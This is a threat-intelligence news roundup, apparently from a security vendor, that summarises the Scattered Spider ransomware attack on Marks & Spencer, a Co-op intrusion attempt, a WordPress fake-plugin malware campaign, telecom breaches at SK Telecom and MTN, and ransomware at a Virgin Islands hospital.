Marks & Spencer cyber disruption linked to ‘Scattered Spider’

Marks & Spencer’s ongoing cyber disruption has now been attributed to a ransomware attack carried out by the notorious threat group known as Scattered Spider. Sources revealed to BleepingComputer that the attack, which encrypted virtual machines on April 24th, disrupted systems including contactless payments and warehouse operations—forcing around 200 staff to stay home.

The attackers reportedly breached the retailer as early as February, stealing Active Directory credentials via the NTDS.dit file. Using this data, they laterally moved through the network and deployed the DragonForce ransomware on VMware ESXi hosts on April 24^th.

Scattered Spider, also known as Octo Tempest or UNC3944, is a loosely affiliated group known for phishing, MFA bombing, SIM swapping, and advanced social engineering. Members are believed to be young, English-speaking, and active on hacker forums.

M&S has engaged CrowdStrike, Microsoft, and Fenix24 for incident response. The investigation remains ongoing, and M&S has declined to comment on specific details of the attack.

Co-op confirms attempted cyberattack disrupting back office systems

British supermarket chain Co-op has confirmed it recently detected attempted unauthorised access to its systems, prompting it to shut down parts of its IT infrastructure as a precaution. The incident caused disruption to back office and call centre operations, although Co-op stores, funeral services, and online delivery platforms remain unaffected.

A Co-op spokesperson said, “We have recently experienced attempts to gain unauthorised access to some of our systems. As a result, we have taken proactive steps to keep our systems safe, which has resulted in a small impact.”

Co-op, which operates over 3,700 stores and supplies more than 5,100 additional outlets across the UK, has not revealed whether the intrusion attempts were successful. No group has yet claimed responsibility.

The incident follows a major ransomware attack on Marks & Spencer last week, attributed to the Scattered Spider group, raising concerns about growing cyber threats to UK retail. Investigations into both attacks continue.

New WordPress malware campaign uses fake security plugin to hijack sites

Security researchers have uncovered a new malware campaign targeting WordPress websites using a deceptive plugin that masquerades as a legitimate security tool. The plugin grants attackers persistent admin access, the ability to execute remote code, and inject malicious JavaScript, all while hiding itself from the plugin dashboard.

Discovered during a site cleanup in January 2025, the malware works through a tampered wp-cron.php file that installs and reactivates a plugin called WP-antymalwary-bot.php. If removed, the plugin reinstalls itself upon the next visit. Other plugin names include addons.php, wpconsole.php, and wp-performance-booster.php.

Once active, the plugin logs attackers in via a hidden emergency login function and injects PHP into theme files using a custom REST API route. It can also insert base64 JavaScript into the site’s <head>.

Wordfence suspects compromised hosting or FTP credentials as the initial infection vector. Site owners are urged to review wp-cron.php, header.php, and suspicious access logs.

SK Telecom hit by data breach, 23 million users offered free SIM replacements

South Korea’s largest mobile operator, SK Telecom, has disclosed a major data breach caused by a malware-based cyberattack, prompting its shares to drop as much as 8.5%—the lowest since August 2023. The breach, detected on April 18, is described by the company as a large-scale customer data leak, though specific details have not been released.

In response, SK Telecom announced it would take full responsibility for any resulting harm and began offering free USIM (Universal Subscriber Identity Module) card replacements to all 23 million users from over 2,600 retail outlets nationwide. The company is also urging customers to sign up for its USIM Protection Service, which offers similar preventive measures. As of Sunday, around 5.54 million users had already enrolled.

The incident marks one of the largest breaches in the region and raises fresh concerns about mobile infrastructure vulnerabilities and user data protection in telecom networks.

MTN reports data breach impacting customers in select markets

MTN Group has confirmed a data breach involving an “unknown third party” that accessed parts of its system, leading to the unauthorised exposure of customer data in some markets. While the exact number of affected individuals has not yet been disclosed, MTN has reported the breach to the South African Police Service (SAPS), the Directorate for Priority Crime Investigation (DPCI), and relevant authorities in other impacted countries.

The telecom giant assured that its core network, billing systems, and financial services infrastructure remain secure. “We have no evidence to suggest that customers’ accounts or wallets have been compromised,” the company said.

MTN is currently notifying affected users but has not provided further information on the nature of the breach or the type of data accessed. No cybercriminal group has claimed responsibility as of April 25, 2025. The incident follows a series of cyberattacks on South African telecoms, highlighting growing national security concerns.

Governor addresses ransomware at JFL Hospital as US Virgin Islands faces ongoing cyber threats

Governor Albert Bryan Jr. confirmed on Monday that Governor Juan F. Luis Hospital (JFL) is facing a ransomware incident, calling it “another crisis” for the already troubled facility. JFL disclosed the cyberattack on Sunday, stating that it had launched an investigation and taken steps to reduce risk. Despite the breach, the hospital assured the public that all clinical services remain fully operational.

The attack on JFL follows a recent ransomware incident at the Virgin Islands Lottery (VIL), which forced weeks of disruption. Hackers demanded a $1 million ransom—refused by VIL Director Raymond Williams—leading to a full system rebuild. VIL is set to reopen on April 29.

JFL has yet to reveal how much data was compromised but emphasised its commitment to protecting patient privacy. More details are expected as the investigation progresses, amid growing cybersecurity threats across the Virgin Islands’ public sector.

If you are worried about any of the threats outlined in this bulletin or need help in determining what steps you should take to protect yourself from the most material threats facing your organisation, please contact your account manager, or alternatively Get in touch to find out how you can protect your organisation. 

The Threat Intel Roundup was prepared by Integrity360 summarising threat news as we observe it, current at the date of publishing. It should not be considered to be legal, consulting or any other professional advice. Any recommendations should be considered in the context of your own organisation. Integrity360 does not take any political stance in the information that we share. Moreover, the opinions expressed may not necessarily be the views of Integrity360.